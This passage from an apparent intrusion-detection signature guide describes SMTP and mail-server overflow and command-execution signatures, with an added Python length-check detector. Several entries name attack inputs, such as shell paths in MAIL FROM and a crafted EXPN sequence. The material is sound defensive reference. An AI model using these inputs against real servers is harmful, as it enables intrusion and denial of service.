body randomly composed from a rather long pool of strings that the virus carries inside itself; the virus can also add
other strings. The vulnerable versions are Microsoft Internet Explorer 5.01 or 5.5 without SP2.
Signature ID: 2202
Remote Pine denial of service
Threat Level: Information
Industry ID: CVE-2002-1320 Bugtraq: 6120
Signature Description: Pine (Program for Internet News & Email) is a tool for reading, sending, and managing
electronic messages. Pine was developed by UW Technology at the University of Washington. Pine 4.44 and earlier
versions are vulnerable to a denial of service attack. By sending an email message with a specially crafted sender address
in the "From:" message header, a remote attacker could overflow a buffer and cause Pine to crash: these versions fail to
parse the address correctly, resulting in a core dump. Execution of arbitrary code may be possible. The message must be
manually removed from the message spool.
Signature ID: 2203
SMTP AUTH LOGON brute force attempt Vulnerability
Threat Level: Information
Signature Description: Brute force is a trial-and-error method used by application programs to decode encrypted data
such as passwords or Data Encryption Standard keys. This event indicates an attempt to log on via SMTP using brute
force methods. This rule triggers when 'Authentication unsuccessful' is detected in a packet.
Signature ID: 2204
Microsoft SSL PCT buffer overflow attempt
Threat Level: Critical
Industry ID: CVE-2003-0719 Bugtraq: 10116 Nessus: 12209
Signature Description: A buffer overrun vulnerability exists in the Private Communications Transport (PCT) protocol,
which is part of the Microsoft Secure Sockets Layer (SSL) library. Only systems that have SSL enabled, and in some
cases Windows 2000 domain controllers, are vulnerable. An attacker who successfully exploited this vulnerability
could take complete control of an affected system. All programs that use SSL could be affected. Although SSL is
generally associated with Internet Information Services by using HTTPS and port 443, any service that implements
SSL on an affected platform is likely to be vulnerable. Here the signature looks for SSL PCT associated with SMTP
(port 465). Affected products include, but are not limited to, Microsoft Internet Information Services 4.0, Microsoft Internet
Information Services 5.0, Microsoft Internet Information Services 5.1, Microsoft Exchange Server 5.5, Microsoft
Exchange Server 2000, Microsoft Exchange Server 2003, Microsoft Analysis Services 2000 (included with SQL Server
2000), and any third-party programs that use PCT (MS04-011).
Signature ID: 2205
SMTP Content-Transfer-Encoding overflow Vulnerability
Threat Level: Severe
Signature Description: This rule tries to find a buffer overflow associated with the Content-Transfer-Encoding field in
the MIME header of an SMTP message. Normally, since the name of the encoding technique is the value of that field, the field is
no more than a few characters long, and the character sequence \r\n (0d 0a) marks the end of the field. If no \r\n sequence
appears in this field within, say, 100 characters, that is a clear indication of a buffer overflow attack.
Signature ID: 2206
SMTP ETRN overflow attempt
Threat Level: Critical
Industry ID: CVE-2000-0490 Bugtraq: 1297
Signature Description: A buffer overflow in NetWin DSMTP 2.7q in the NetWin dmail package allows remote
attackers to execute arbitrary commands via a long ETRN request. NetWin DMail 2.8a-h and prior, and NetWin DMail 2.7q
and prior, are vulnerable to this attack. A successful attacker can crash the mail server or execute arbitrary code
with root access.
Signature ID: 2207
Sendmail Header Processing Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2002-1337 Bugtraq: 6991
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail versions 5.79 to 8.12.7 contain a buffer overflow
vulnerability. This rule triggers when an attacker sends an email with a specially crafted "From", "To", or "CC"
header field; a remote attacker could thereby bypass the "skipping" mode email header check and overflow a buffer to gain root
access to the affected system. This issue is fixed in Sendmail 8.12.8. Administrators are advised to update to version 8.12.8
to resolve this issue.
Signature ID: 2208
SMTP MAIL FROM sendmail prescan too long addresses overflow
Threat Level: Critical
Industry ID: CVE-2003-0161
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by certain conversions from char and int types. Successful exploitation
of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability is fixed in
Sendmail 8.12.9. Administrators are advised to update the product. This rule triggers when an attacker sends a specially
formatted MAIL FROM address field.
Signature ID: 2209
SMTP MAIL FROM sendmail prescan too many addresses overflow
Threat Level: Critical
Industry ID: CVE-2002-1337 Bugtraq: 6991
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by improper bounds checking of user-supplied data. Successful
exploitation of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability
is fixed in Sendmail 8.12.8. Administrators are advised to update the product. This rule triggers when an attacker
sends a specially formatted MAIL FROM address field.
Signature ID: 2210
SMTP RCPT TO decode attempt Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0203 CVE-1999-0163 Bugtraq: 2308
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail versions prior to 8.6.12 could allow a remote
attacker to execute arbitrary commands. This signature detects when an attacker sends invalid "MAIL FROM" and
"RCPT TO" addresses. Successful exploitation of this issue allows an attacker to gain root access on the
affected machine.
Signature ID: 2211
SMTP RCPT TO Command with Command Argument Length Exceeding 300 Bytes
Threat Level: Severe
Industry ID: CVE-2001-0260 CVE-2006-4379 CVE-2009-0410 Bugtraq: 2283,19885,33560
Signature Description: The SMTP RCPT TO command is used to identify an individual recipient of the mail data. The
argument field contains a forward-path (normally consisting of the destination mailbox and/or relay hosts) and may contain
optional parameters. This rule triggers when a packet with a long RCPT TO argument (exceeding 300 bytes) is sent.
Products like IPSwitch IMail Server 2006 and Lotus Domino SMTP Server 5 are vulnerable to this type of attack.
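Signatures 2200, 2205 and 2211 above are all length heuristics on the SMTP stream: a HELO argument above 120000 bytes, a Content-Transfer-Encoding value with no CRLF within 100 characters, and an RCPT TO argument exceeding 300 bytes. The block below is an added, defender-side illustration of those three checks run over a constructed client session; it is not the TMS zl Module's rule engine or code from the guide. The thresholds are the ones quoted in the signature descriptions; the regex, the function names and the sample session are this example's own.

```python
"""Added example (not part of the signature guide or the TMS zl Module):
defender-side length checks of the kind Signatures 2200, 2205 and 2211
describe, run over a constructed SMTP session. Thresholds are the ones
quoted in those descriptions; helper names and sample data are this example's own."""
import re

HELO_LIMIT = 120000   # Signature 2200: HELO argument above 120000 bytes
RCPT_ARG_LIMIT = 300  # Signature 2211: RCPT TO argument exceeding 300 bytes
CTE_LIMIT = 100       # Signature 2205: no CRLF within 100 bytes of the field value

# One SMTP command line: a four-letter verb, optionally followed by an argument.
SMTP_CMD = re.compile(rb"^([A-Za-z]{4})(?:[ \t]+(.*))?$", re.DOTALL)


def check_smtp_command(line):
    """Return alert strings for one client command line (bytes, CRLF stripped)."""
    alerts = []
    m = SMTP_CMD.match(line)
    if not m:
        return alerts                      # not a well-formed command; nothing to measure
    verb = m.group(1).upper()
    arg = m.group(2) or b""
    if verb == b"HELO" and len(arg) > HELO_LIMIT:
        alerts.append("2200 HELO argument of %d bytes exceeds %d" % (len(arg), HELO_LIMIT))
    if verb == b"RCPT":
        # The forward-path follows the "TO:" keyword; measure only that part.
        path = arg[3:] if arg[:3].upper() == b"TO:" else arg
        if len(path) > RCPT_ARG_LIMIT:
            alerts.append("2211 RCPT TO argument of %d bytes exceeds %d" % (len(path), RCPT_ARG_LIMIT))
    return alerts


def check_mime_headers(headers):
    """Flag a Content-Transfer-Encoding field whose value runs for CTE_LIMIT
    bytes without a CRLF (Signature 2205's heuristic). `headers` is the raw,
    CRLF-terminated header block of the DATA section; a truncated block with
    no terminator would also be flagged, which is the conservative choice."""
    alerts = []
    key = b"content-transfer-encoding:"
    lowered = headers.lower()
    pos = lowered.find(key)
    while pos != -1:
        start = pos + len(key)
        window = headers[start:start + CTE_LIMIT]
        if b"\r\n" not in window:
            alerts.append("2205 Content-Transfer-Encoding value has no CRLF within %d bytes" % CTE_LIMIT)
        pos = lowered.find(key, start)
    return alerts


def scan_session(commands, data_headers=b""):
    """Apply both checks to a list of command lines plus the DATA header block."""
    alerts = []
    for line in commands:
        alerts.extend(check_smtp_command(line))
    alerts.extend(check_mime_headers(data_headers))
    return alerts


# Constructed sample session: benign HELO and MAIL FROM, an oversized
# RCPT TO forward-path and an oversized Content-Transfer-Encoding value.
SAMPLE_COMMANDS = [
    b"HELO mail.example.test",
    b"MAIL FROM:<alice@example.test>",
    b"RCPT TO:<" + b"a" * 400 + b"@example.test>",
]
SAMPLE_HEADERS = (
    b"Content-Type: text/plain\r\n"
    b"Content-Transfer-Encoding: " + b"A" * 150 + b"\r\n\r\n"
)

if __name__ == "__main__":
    for alert in scan_session(SAMPLE_COMMANDS, SAMPLE_HEADERS):
        print(alert)
```

Running the block prints one 2211-style alert for the 415-byte forward-path and one 2205-style alert for the header value; the benign HELO stays silent. Because every check is a bare length threshold, a sensor built this way should measure the same bytes the rule description names (the argument after the verb, the value after the field name), otherwise the threshold will not mean what the signature says it means.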
Signature ID: 2212
SMTP RCPT TO sendmail prescan too long addresses overflow
Threat Level: Critical
Industry ID: CVE-2003-0161 Bugtraq: 7230
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by certain conversions from char and int types. Successful exploitation
of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability is fixed in the
Sendmail 8.12.9 release. Administrators are advised to update the product. This rule triggers when an attacker sends a
specially formatted RCPT TO address field.
Signature ID: 2213
SMTP RCPT TO sendmail prescan too many addresses overflow
Threat Level: Critical
Industry ID: CVE-2002-1337 Bugtraq: 6991
Signature Description: This rule hits when an attempt is made to exploit a known prescan function vulnerability in
older versions of Sendmail. The vulnerability exists in the prescan() function used in Sendmail prior to version 8.12.9.
The prescan() function fails when converting a character to an integer value while processing SMTP headers. An attacker
could exploit this condition by sending a large string to the prescan function.
Signature ID: 2214
SMTP SAML FROM sendmail prescan too long addresses overflow
Threat Level: Critical
Industry ID: CVE-2003-0161 Bugtraq: 7230
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by improper bounds checking of user-supplied data. Successful
exploitation of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability
is fixed in Sendmail 8.12.9. Administrators are advised to update the product. This rule triggers when an attacker
sends a specially formatted SAML FROM address field.
Signature ID: 2215
SMTP SAML FROM sendmail prescan too many addresses overflow
Threat Level: Critical
Industry ID: CVE-2002-1337 Bugtraq: 6991
Signature Description: A buffer overflow in Sendmail 5.79 to 8.12.8 allows remote attackers to execute arbitrary code
via certain formatted address fields, related to sender and recipient header comments as processed by the crackaddr
function of headers.c. A vulnerability exists in the prescan() function used in Sendmail prior to version 8.12.9. This
function contains an error when converting a character to an integer value while processing SMTP headers.
Signature ID: 2216
SMTP SEND FROM sendmail prescan too long addresses overflow
Threat Level: Critical
Industry ID: CVE-2003-0161 Bugtraq: 7230
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by certain conversions from char and int types. Successful exploitation
of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability is fixed in
Sendmail 8.12.9. Administrators are advised to update the product. This rule triggers when an attacker sends a specially
formatted SEND FROM address field.
Signature ID: 2217
SMTP SEND FROM sendmail prescan too many addresses overflow
Threat Level: Critical
Industry ID: CVE-2002-1337 Bugtraq: 6991
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by improper bounds checking of user-supplied data. Successful
exploitation of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability
is fixed in Sendmail 8.12.9. Administrators are advised to update the product. This rule triggers when an attacker
sends a specially formatted SEND FROM address field.
Signature ID: 2218
SMTP SOML FROM sendmail prescan too long addresses overflow
Threat Level: Critical
Industry ID: CVE-2003-0161 Bugtraq: 7230
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by certain conversions from char and int types. Successful exploitation
of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability is fixed in
Sendmail 8.12.9. Administrators are advised to update the product. This rule triggers when an attacker sends a specially
formatted SOML FROM address field.
Signature ID: 2219
SMTP SOML FROM sendmail prescan too many addresses overflow
Threat Level: Critical
Industry ID: CVE-2002-1337 Bugtraq: 6991
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by improper bounds checking of user-supplied data. Successful
exploitation of this issue allows an attacker to execute arbitrary code on the vulnerable system. This vulnerability
is fixed in Sendmail 8.12.9. Administrators are advised to update the product. This rule triggers when an attacker
sends a specially formatted SOML FROM address field.
Signature ID: 2220
SMTP VRFY overflow vulnerability
Threat Level: Critical
Industry ID: CVE-2003-0161
Signature Description: Simple Mail Transfer Protocol is a TCP/IP protocol used in sending and receiving e-mail. A
remotely exploitable buffer overflow vulnerability affects SMTP servers. The problem lies in the code that handles the
'VRFY' command. Successful exploitation of this issue allows an attacker to execute arbitrary code on the
vulnerable system. This rule triggers when an attacker sends an overly long argument to the 'VRFY' command.
Signature ID: 2221
SMTP WinZip MIME content-disposition buffer overflow
Threat Level: Information
Industry ID: CVE-2004-0333 Bugtraq: 9758 Nessus: 12621
Signature Description: A buffer overflow error exists in the way that WinZip handles certain parameters of MIME
archives. This error results in a vulnerability when WinZip attempts to interpret invalid data in a MIME-encoded file. An
attacker could exploit this vulnerability by introducing a specially crafted file to be opened by WinZip, and then
coaxing or tricking a user or application into opening it. The malicious file could be introduced in a number of ways
including, but not limited to, a remote web page, an email attachment, peer-to-peer file sharing, or network
filesystems. WinZip 6.2 through WinZip 8.1 SR-1, and possibly other packages, are vulnerable to this attack.
Signature ID: 2222
SMTP WinZip MIME content-type buffer overflow
Threat Level: Critical
Industry ID: CVE-2004-0333 Bugtraq: 9758 Nessus: 12621
Signature Description: A buffer overflow error exists in the way that WinZip handles certain parameters of MIME
archives. This error results in a vulnerability when WinZip attempts to interpret invalid data in a MIME-encoded file. An
attacker could exploit this vulnerability by introducing a specially crafted file to be opened by WinZip, and then
coaxing or tricking a user or application into opening it. The malicious file could be introduced in a number of ways
including, but not limited to, a remote web page, an email attachment, peer-to-peer file sharing, or network
filesystems. WinZip 6.x, 7.x, 8.0, 8.1, 8.1 SR-1, and WinZip 9.0 beta versions are vulnerable to this attack.
Signature ID: 2223
Microsoft Exchange Server Extended Verb XEXCH50 Request Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0714 Bugtraq: 8838 Nessus: 11889
Signature Description: Microsoft Exchange is a popular collaboration product which includes extensive support for
electronic mail, including support for SMTP. SMTP is a standard protocol for exchanging electronic mail over the
internet. Exchange uses SMTP to communicate special handling instructions from one Exchange server to another
through the use of SMTP extended verbs. Exchange fails to process the XEXCH50 command correctly. Exchange 5.5 and
Exchange 2000 are vulnerable. Successful exploitation of this issue allows an attacker to execute arbitrary
commands with user privileges. This rule triggers when an attempt is made to exploit this vulnerability. Apply a
patch as described in Microsoft Security Bulletin MS03-046.
Signature ID: 2224
NetManage Chameleon SMTP Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-1999-0261 Bugtraq: 2387
Signature Description: Chameleon is a suite of Internet services offered by NetManage. NetManage Chameleon 4.5
and NetManage Chameleon Unix 97 contain a buffer overflow vulnerability that may be remotely exploitable.
The vulnerability is in the argument to the HELP command. Successful exploitation allows an attacker to execute
arbitrary commands with user privileges. This rule triggers when an attempt is made to exploit this vulnerability.
Signature ID: 2225
SMTP Server Scanning with Cybercop using EHLO Command
Threat Level: Information
Industry ID: CVE-1999-0531 Nessus: 10249
Signature Description: Cybercop Scanner is scanning software that searches for system vulnerabilities. It sends an
EHLO command to SMTP server ports to determine whether the SMTP server will return a list of the remote commands that it
accepts. An attacker can then issue the accepted commands that are vulnerable against the SMTP server.
Signature ID: 2226
SMTP exchange mime DOS
Threat Level: Information
Industry ID: CVE-2000-1006 Bugtraq: 1869 Nessus: 10558
Signature Description: Microsoft Exchange Server 5.0 and 5.5 are unable to process emails that contain malformed
MIME headers with an empty value for charset. In the event that Exchange Server receives an email with an invalid
MIME header, Exchange would cease to operate. Restarting the service and deleting the offending email would be
required in order to regain normal functionality. In order to determine the offending email, restart Exchange. The
hostile email would then appear at the front of the queue.
Signature ID: 2227
SMTP Malformed expn Command attempt
Threat Level: Information
Industry ID: CVE-1999-1200
Signature Description: SMTP servers are vulnerable to DoS attacks if a remote attacker sends a specific set of
commands to the server process that causes the system to consume all available memory and disk space and increase CPU
usage to 100%. This event is generated when an attempt is made to send a malformed request to an SMTP server which
may cause a denial of service. SMTP provides useful commands like EXPN. The EXPN command is used to learn the
user accounts on the SMTP server. An attacker uses this command to learn the user accounts, or to cause a DoS by sending a
specially crafted EXPN command to the SMTP server. The attacker first connects to the SMTP server (for example with telnet), then issues MAIL
FROM and RCPT TO commands, and after that sends an EXPN command followed by '*@'; this command leads the SMTP
server into a DoS. Vixar MailServer for Windows is vulnerable to this attack. If the EXPN service is
not needed, it is recommended to disable the EXPN command on the SMTP server.
Signature ID: 2228
SMTP Cybercop attempt with EXPN service
Threat Level: Information
Industry ID: CVE-1999-0531 Nessus: 10249
Signature Description: Cybercop Scanner is scanning software that searches for system vulnerabilities. It sends an EXPN
command to SMTP server ports to determine whether the SMTP server will return a list of email addresses, aliases, and
distribution lists. If the SMTP server responds to the EXPN request, the attacker learns sensitive information about the
SMTP server. If the EXPN service is not needed, it is recommended to disable it on the SMTP server.
Signature ID: 2229
Majordomo lists Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0208 CVE-1999-0207 Bugtraq: 2310,1749
Signature Description: Majordomo is a Perl-based Internet e-mail list server. Great Circle Associates Majordomo 1.90
and Great Circle Associates Majordomo 1.89 are vulnerable to an attack in which specially crafted e-mail headers are
processed incorrectly. This is possible only when the "advertise" or "no advertise" directives are specified in the
configuration files. Successful exploitation of this attack allows an attacker to execute arbitrary commands with
user privileges. This rule triggers when an attempt is made to exploit this vulnerability. Upgrade to the latest version
available from the vendor's web site.
Signature ID: 2230
SMTP rcpt to command attempt
Threat Level: Information
Industry ID: CVE-1999-0095 Bugtraq: 1
Signature Description: A vulnerability exists in older versions of Sendmail associated with the debug mode.
Malformed text specifying the recipient could be a command that would execute at the privilege level of Sendmail,
often root. The "sed" command is used to strip off the mail headers before executing the supplied command. This
vulnerability was exploited by the Morris worm. Sendmail versions prior to 5.5.9 are vulnerable to this attack.
Signature ID: 2231
SMTP sendmail 5.5.5 MAIL FROM Parse Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0203 CVE-1999-0163 Bugtraq: 2308 Nessus: 10258
Signature Description: Older versions of sendmail, i.e. before 8.6.10, fail to process malformed message headers
correctly, leading to remote command execution as root. All versions of sendmail based on 5.x are vulnerable to this
attack. The attacker sends a crafted MAIL FROM message to the server, and the server then executes the command. A
successful attack allows remote execution of commands with root privileges. Upgrade to version 8.6.10 or higher of
Sendmail.
Signature ID: 2232
SMTP sendmail 5.6.5 MAIL FROM command Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0203 CVE-1999-0163 Bugtraq: 2308
Signature Description: Older versions of sendmail are vulnerable to a message header parsing vulnerability. Remote
attackers can exploit this by sending a malformed MAIL FROM value such as /usr/bin/tail or /usr/bin/sh (alias
/usr/ucb/tail) and placing shell code in the message. The receiving server executes the shell code in the context of the
server, causing a remote root compromise. This vulnerability involves sending malformed "mail from" or "rcpt to"
addresses that cause sendmail to inappropriately redirect data to another program. All systems running Sendmail
versions lower than 8.6.10 are vulnerable to this attack.
Signature ID: 2233
SMTP sendmail 8.6.10 exploit via IDENT message with tab character
Threat Level: Critical
Industry ID: CVE-1999-0204 Bugtraq: 2311
Signature Description: Sendmail 8.6.10 allows remote attackers to execute root commands using ident. Sendmail
version 8.6.10 connects back to the ident service to log user information. This version of Sendmail does not validate the
information returned by the client. If the response from the client to Sendmail contains a special character such as a
tab (\t), sendmail fails to parse the response received. An attacker can use this flaw to gain full control of the affected
system. Systems running unpatched versions of Sendmail 8.6.10 or earlier are vulnerable to this attack.
Signature ID: 2234
SMTP sendmail 8.6.9 IDENT remote root command execution attempt
Threat Level: Information
Industry ID: CVE-1999-0204 Bugtraq: 2311
Signature Description: Sendmail 8.6.9 allows remote attackers to execute root commands using ident. Sendmail
version 8.6.9 connects back to the ident service to log user information. This version of Sendmail does not validate the
information returned by the client. If the response from the client to Sendmail is longer than expected, the response
overflows a buffer. This condition could allow a remote attacker to execute commands on the host system and gain
privileged access to the system. Eric Allman Sendmail 8.6.9 is vulnerable to this attack. Upgrade to at least version
8.6.10 of sendmail.
Signature ID: 2235
SMTP sendmail 8.6.9c IDENT Remote root exploit
Threat Level: Information
Industry ID: CVE-1999-0204 Bugtraq: 2311
Signature Description: Sendmail 8.6.9c allows remote attackers to execute root commands using ident. Sendmail
version 8.6.9c connects back to the ident service to log user information. This version of Sendmail does not validate the
information returned by the client. If the response from the client to Sendmail is longer than expected, the response
overflows a buffer. This condition could allow a remote attacker to execute commands on the host system and gain
privileged access to the system. Eric Allman Sendmail 8.6.9 is vulnerable to this attack. Upgrade to at least version
8.6.10 of sendmail.
Signature ID: 2237
SMTP vrfy decode
Threat Level: Information
Industry ID: CVE-1999-0096 CVE-2004-0763 Bugtraq: 10248
Signature Description: This event is generated when a remote user attempts to scan for a vulnerability in the VRFY
command on internal SMTP servers. A remote attacker can send mail to the decode or uudecode alias that is present on
some systems to create or overwrite files on the remote host. This allows an attacker to gain remote access to the
system.
Signature ID: 2238
SMTP vrfy root
Threat Level: Information
Signature Description: This event is generated when an external attacker uses the "vrfy root" command to find the
login name or mail alias of the system administrator. The VRFY command may be used to check the validity of an
account.
Signature ID: 2239
SMTP BCC command overflow vulnerability
Threat Level: Information
Industry ID: CVE-2004-0400 Bugtraq: 10291 Nessus: 14493,12538
Signature Description: This rule tries to detect an attempt to overflow the 'BCC' field in an SMTP header. Exim version
4.32 is vulnerable to a stack-based buffer overflow caused by improper bounds checking in SMTP header handling. If
the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default, a remote
attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable
system. Upgrade to the latest version of Exim (3.35 or later) to resolve this issue.
Signature ID: 2240
SMTP CC command overflow vulnerability
Threat Level: Information
Industry ID: CVE-2004-0400 Bugtraq: 10291 Nessus: 14493,12538
Signature Description: This rule tries to detect an attempt to overflow the 'CC' field in an SMTP header. Exim version
4.32 is vulnerable to a stack-based buffer overflow caused by improper bounds checking in SMTP header handling. If
the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default, a remote
attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable
system. Upgrade to the latest version of Exim (3.35 or later) to resolve this issue.
Signature ID: 2241
SMTP Content-Encoding overflow attempt vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0113 Bugtraq: 7419
Signature Description: URLMON.DLL is a library used by Microsoft Internet Explorer. Microsoft Internet Explorer
5.01, 5.5 and 6.0 are vulnerable to a buffer overflow. A remote attacker could exploit this vulnerability by sending a
long argument in the Content-Encoding field. Successful exploitation of this attack allows the attacker to execute
arbitrary commands. Apply the patch described in MS03-015.
Signature ID: 2242
SMTP Content-Type overflow attempt vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0113 Bugtraq: 7419
Signature Description: URLMON.DLL is a library used by Microsoft Internet Explorer. Microsoft Internet Explorer
5.01, 5.5 and 6.0 are vulnerable to a buffer overflow. A remote attacker could exploit this vulnerability by sending a
long argument in the Content-Type field. Successful exploitation of this attack allows the attacker to execute arbitrary
commands. Apply the patch described in MS03-015.
Signature ID: 2243
SMTP From command overflow attempt
Threat Level: Information
Industry ID: CVE-2004-0400 Bugtraq: 10291 Nessus: 14493,12538
Signature Description: Mail servers are reportedly prone to a remotely exploitable stack-based buffer overrun
vulnerability. This issue is exposed if header syntax checking has been enabled in the agent and may be triggered by a
malicious e-mail. If this condition were exploited, it would result in execution of arbitrary code in the context of
the mail transfer agent; otherwise, the agent would crash when handling malformed syntax in an e-mail message. Exim 4
versions before 4.33 are vulnerable to this attack.
Signature ID: 2244
SMTP Mail Transfer Agent MAIL FROM Overflow Attempt Vulnerability
Threat Level: Critical
Industry ID: CVE-2004-0399 Bugtraq: 10290
Signature Description: This rule tries to detect an attempt to overflow the MAIL FROM field in an SMTP header.
Applications such as Exim version 4.32 are vulnerable to a stack-based buffer overflow caused by improper bounds
checking in SMTP header handling. A remote attacker could exploit this vulnerability to overflow a buffer and possibly
execute arbitrary code on the vulnerable system. Upgrade to the latest version of Exim (3.35 or later).
Signature ID: 2245
SMTP ReplyTo command overflow vulnerability
Threat Level: Information
Industry ID: CVE-2004-0400 Bugtraq: 10291 Nessus: 14493,12538
Signature Description: This rule tries to detect an attempt to overflow the Reply-To field in an SMTP header. Exim
version 4.32 is vulnerable to a stack-based buffer overflow caused by improper bounds checking in SMTP header
handling. If the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default, a
remote attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the
vulnerable system. Upgrade to the latest version of Exim (3.35 or later) to resolve this issue.
Signature ID: 2246
SMTP Sender command overflow vulnerability
Threat Level: Information
Industry ID: CVE-2004-0400 Bugtraq: 10291 Nessus: 14493,12538
Signature Description: This rule tries to detect an attempt to overflow the SENDER field in an SMTP header. Exim
version 4.32 is vulnerable to a stack-based buffer overflow caused by improper bounds checking in SMTP header
handling. If the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default, a
remote attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the
vulnerable system. Upgrade to the latest version of Exim (3.35 or later) to resolve this issue.
Signature ID: 2247
SMTP To command overflow vulnerability
Threat Level: Information
Industry ID: CVE-2004-0400 Bugtraq: 10291 Nessus: 14493,12538
Signature Description: This rule tries to detect an attempt to overflow the TO field in an SMTP header. Exim version
4.32 is vulnerable to a stack-based buffer overflow caused by improper bounds checking in SMTP header handling. If
the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default, a remote
attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable
system. Upgrade to the latest version of Exim (3.35 or later) to resolve this issue.
Signature ID: 2248
Microsoft SSL PCT buffer overflow vulnerability
Threat Level: Critical
Industry ID: CVE-2003-0719 Bugtraq: 10116 Nessus: 12209
Signature Description: A buffer overrun vulnerability exists in the Private Communications Transport (PCT) protocol,
which is part of the Microsoft Secure Sockets Layer (SSL) library. Only systems that have SSL enabled, and in some
cases Windows 2000 domain controllers, are vulnerable. An attacker who successfully exploited this vulnerability
could take complete control of an affected system. All programs that use SSL could be affected. Although SSL is
generally associated with Internet Information Services by way of HTTPS and port 443, any service that implements
SSL on an affected platform is likely to be vulnerable. In this case PCT is reached over SMTP (STARTTLS). This
includes, but is not limited to, Microsoft Internet Information Services 4.0, Microsoft Internet Information Services 5.0,
Microsoft Internet Information Services 5.1, Microsoft Exchange Server 5.5, Microsoft Exchange Server 2000,
Microsoft Exchange Server 2003, Microsoft Analysis Services 2000 (included with SQL Server 2000), and any
third-party programs that use PCT (MS04-011).
Signature ID: 2249
Microsoft Windows Collaboration Data Objects buffer overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1987 Bugtraq: 15067
Signature Description: Collaboration Data Objects (CDO) is a Component Object Model (COM) component designed
to, among other functions, make it easier to write programs that create or change Internet mail messages. Microsoft
Windows 2000, Windows XP, Windows Server 2003 and Microsoft Exchange 2000 Server could allow a remote
attacker to execute arbitrary code on the system, caused by a buffer overflow in the Collaboration Data Objects (CDO).
This rule triggers when an attempt is made to send a long argument in the From header field.
Signature ID: 2250
Microsoft Windows Collaboration Data Objects buffer overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1987 Bugtraq: 15067
Signature Description: Collaboration Data Objects (CDO) is a Component Object Model (COM) component designed
to, among other functions, make it easier to write programs that create or change Internet mail messages. Microsoft
Windows 2000, Windows XP, Windows Server 2003 and Microsoft Exchange 2000 Server could allow a remote
attacker to execute arbitrary code on the system, caused by a buffer overflow in the Collaboration Data Objects (CDO).
This rule triggers when an attempt is made to send a long argument in the Content-Type header field.
Signature ID: 2251
Microsoft Exchange Server X-LINK2STATE Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0560 Bugtraq: 13118
Signature Description: SMTP extended verbs add new functionality to the SMTP protocol. Microsoft Exchange uses
one such extended verb, "X-LINK2STATE", to communicate routing and other Exchange-specific information among
